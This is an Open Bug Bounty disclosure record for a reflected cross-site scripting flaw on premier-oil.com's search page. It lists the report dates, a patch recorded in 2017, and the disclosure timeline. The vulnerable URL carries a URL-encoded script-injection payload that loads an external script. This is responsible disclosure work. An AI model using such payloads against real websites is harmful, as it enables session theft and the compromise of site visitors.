premier-oil.com XSS vulnerability

2016-06-18T04:33:00
ID OBB:159738
Type openbugbounty
Reporter OmniGooch
Modified 2017-07-27T09:56:00

Description

Vulnerable URL:
http://www.premier-oil.com/premieroil/search?search_query=%3Cscript+src%3Dhttps%3A%2F%2Fopenbugbounty.org%2F1.js%3E&go.x;=0&go.y;=0
Details:

Description| Value
---|---
Patched:| Yes, at 27.07.2017
Latest check for patch:| 27.07.2017 09:56 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 466288
VIP website status:| No
Check premier-oil.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 June, 2016 04:33 GMT
Generic security notifications sent to website owner| 18 June, 2016 04:35 GMT
Customized security notification sent to website owner| 18 June, 2016 04:35 GMT
Notification sent to subscribers (without technical details)| 18 June, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 25 June, 2016 05:12 GMT
Vulnerability patched by the website owner| 27 July, 2017 09:56 GMT